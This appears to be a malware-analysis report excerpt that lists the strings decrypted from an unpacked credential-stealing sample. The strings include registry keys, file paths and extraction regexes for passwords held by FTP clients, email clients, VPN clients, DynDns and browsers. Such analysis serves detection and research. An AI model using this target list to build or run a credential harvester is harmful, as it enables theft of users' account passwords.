                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Microsoft\Credentials\
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Microsoft\Protect\
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: credential
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: QQ Browser
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Tencent\QQBrowser\User Data
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Default\EncryptedStorage
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Profile
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \EncryptedStorage
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: entries
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: category
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: str3
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: str2
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: blob0
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: password_value
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: IncrediMail
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: PopPassword
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SmtpPassword
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Software\IncrediMail\Identities\
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Accounts_New
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: PopPassword
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SmtpPassword
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SmtpServer
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: EmailAddress
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Eudora
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Software\Qualcomm\Eudora\CommandLine\
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: current
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Settings
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SavePasswordText
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Settings
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ReturnAddress
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Falkon Browser
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \falkon\profiles\
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: profiles.ini
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: startProfile=([A-z0-9\/\.\"]+)
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: profiles.ini
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \browsedata.db
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: autofill
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ClawsMail
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Claws-mail
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \clawsrc
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \clawsrc
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: passkey0
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: master_passphrase_salt=(.+)
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: master_passphrase_pbkdf2_rounds=(.+)
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \accountrc
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: smtp_server
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: address
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: account
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \passwordstorerc
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: {(.*),(.*)}(.*)
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Flock Browser
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: APPDATA
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Flock\Browser\
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: signons3.txt
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: DynDns
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ALLUSERSPROFILE
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Dyn\Updater\config.dyndns
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: username=
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: password=
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: https://account.dyn.com/
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: t6KzXhCh
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ALLUSERSPROFILE
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Dyn\Updater\daemon.cfg
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: global
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: accounts
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: account.
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: username
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: account.
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Psi/Psi+
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: name
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Psi/Psi+
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: APPDATA
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Psi\profiles
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: APPDATA
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Psi+\profiles
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \accounts.xml
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \accounts.xml
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: OpenVPN
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Software\OpenVPN-GUI\configs
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Software\OpenVPN-GUI\configs
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Software\OpenVPN-GUI\configs\
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: username
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: auth-data
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: entropy
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: USERPROFILE
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \OpenVPN\config\
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: remote
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: remote
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: NordVPN
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: NordVPN
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: NordVpn.exe*
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: user.config
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: //setting[@name='Username']/value
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: //setting[@name='Password']/value
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: NordVPN
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Private Internet Access
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: %ProgramW6432%
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Private Internet Access\data
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ProgramFiles(x86)
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Private Internet Access\data
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \account.json
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: .*"username":"(.*?)"
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: .*"password":"(.*?)"
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Private Internet Access
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: privateinternetaccess.com
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: FileZilla
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: APPDATA
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \FileZilla\recentservers.xml
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: APPDATA
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \FileZilla\recentservers.xml
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <Server>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <Host>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <Host>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: </Host>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <Port>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: </Port>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <User>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <User>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: </User>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <Pass encoding="base64">
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <Pass encoding="base64">
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: </Pass>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <Pass>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <Pass encoding="base64">
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: </Pass>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: CoreFTP
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SOFTWARE\FTPWare\COREFTP\Sites
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: User
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Host
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Port
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: hdfzpysvpzimorhk
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: WinSCP
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: HostName
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: UserName
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: PublicKeyFile
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: PortNumber
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: [PRIVATE KEY LOCATION: "{0}"]
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: WinSCP
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ABCDEF
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Flash FXP
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: port
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: user
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: pass
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: quick.dat
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Sites.dat
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \FlashFXP\
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \FlashFXP\
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: yA36zA48dEhfrvghGRg57h5UlDv3
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: FTP Navigator
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SystemDrive
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \FTP Navigator\Ftplist.txt
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Server
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: No Password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: User
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SmartFTP
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: APPDATA
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SmartFTP\Client 2.0\Favorites\Quick Connect
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: WS_FTP
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: appdata
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Ipswitch\WS_FTP\Sites\ws_ftp.ini
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: HOST
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: PWD=
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: PWD=
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: FtpCommander
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SystemDrive
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SystemDrive
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Program Files (x86)\FTP Commander\Ftplist.txt
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SystemDrive
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \cftp\Ftplist.txt
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \VirtualStore\Program Files (x86)\FTP Commander\Ftplist.txt
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \VirtualStore\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ;Password=
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ;User=
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ;Server=
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ;Port=
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ;Port=
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ;Password=
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ;User=
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: ;Anonymous=
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: FTPGetter
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \FTPGetter\servers.xml
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <server>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <server_ip>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <server_ip>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: </server_ip>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <server_port>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: </server_port>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <server_user_name>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <server_user_name>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: </server_user_name>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <server_user_password>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: <server_user_password>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: </server_user_password>
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: FTPGetter
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: The Bat!
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: appdata
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \The Bat!
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Account.CFN
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Account.CFN
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: +-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Becky!
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: HKEY_CURRENT_USER\Software\RimArts\B2\Settings
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: DataDir
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Folder.lst
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Mailbox.ini
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Account
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: PassWd
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Account
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SMTPServer
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Account
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: MailAddress
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Becky!
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Outlook
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Email
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: IMAP Password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: POP3 Password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: HTTP Password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SMTP Password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Email
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Email
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Email
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: IMAP Password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: POP3 Password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: HTTP Password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SMTP Password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Server
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Windows Mail App
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: COMPlus_legacyCorruptedStateExceptionsPolicy
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Software\Microsoft\ActiveSync\Partners
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Email
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Server
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SchemaId
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: pResourceElement
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: pIdentityElement
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: pPackageSid
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: pAuthenticatorElement
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: syncpassword
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: mailoutgoing
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: FoxMail
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Executable
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: FoxmailPath
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Storage\
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Storage\
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \mail
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \mail
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \VirtualStore\Program Files\Foxmail\mail
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \VirtualStore\Program Files\Foxmail\mail
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Accounts\Account.rec0
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Accounts\Account.rec0
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Account.stg
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Account.stg
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: POP3Host
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SMTPHost
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: IncomingServer
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Account
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: MailAddress
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: POP3Password
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Opera Mail
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Opera Mail\Opera Mail\wand.dat
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Opera Mail\Opera Mail\wand.dat
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: opera:
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: abcdefghijklmnopqrstuvwxyz1234567890_-.~!@#$%^&*()[{]}\|';:,<>/?+=
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: PocoMail
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: appdata
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: \Pocomail\accounts.ini
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Email
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: POPPass
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SMTPPass
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: SMTP
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: eM Client
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: eM Client\accounts.dat
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: eM Client
                        Source: 0.2.LisectAVT_2403002A_16.exe.41af710.4.unpackString decryptor: Accounts
